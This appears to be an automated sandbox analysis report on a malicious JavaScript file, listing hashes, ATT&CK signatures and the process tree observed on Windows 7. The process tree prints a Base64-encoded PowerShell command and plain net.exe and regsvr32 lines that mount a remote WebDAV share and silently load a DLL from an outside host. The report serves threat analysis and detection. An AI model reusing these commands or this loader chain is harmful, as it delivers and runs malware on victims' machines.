Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    25/07/2024, 15:57

General

  • Target

    213911248442766951.js

  • Size

    19KB

  • MD5

    5c2d257e51e5f6cb4ea13e803c140c6b

  • SHA1

    081f1ae150c216471841da74da846eb1480ae271

  • SHA256

    6e5c3fb55548ba47c94bda0ead0d360f889ddef72fa339309640cfc34f31a52b

  • SHA512

    afe3a87c7e334fe2abb217ee9cf8cb02ccf36fdeeea223da51301d75883bf8b0a703ecfeece1f3ac8334ed135581efc98d033f17a8cfc126d09f05ed2b9ae25b

  • SSDEEP

    384:lDuN6ZVSsdzKGvbPUf5tssFtcD2Yj6gzjNfAvM1PsUK3Z0jZe06iTmVFfKN6YjsW:puYZVSsdzKGvbsf5Pm

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\213911248442766951.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA5ADEANwA2ADEAMgAwADcANQAxADEAMAA1ADEALgBkAGwAbAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
        3⤵
          PID:2868
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\91761207511051.dll
          3⤵
            PID:2916

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2796-4-0x000007FEF650E000-0x000007FEF650F000-memory.dmp

        Filesize

        4KB

      • memory/2796-7-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

        Filesize

        9.6MB

      • memory/2796-6-0x0000000002AF0000-0x0000000002AF8000-memory.dmp

        Filesize

        32KB

      • memory/2796-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

        Filesize

        2.9MB

      • memory/2796-8-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

        Filesize

        9.6MB

      • memory/2796-9-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

        Filesize

        9.6MB

      • memory/2796-10-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

        Filesize

        9.6MB

      • memory/2796-11-0x000007FEF6250000-0x000007FEF6BED000-memory.dmp

        Filesize

        9.6MB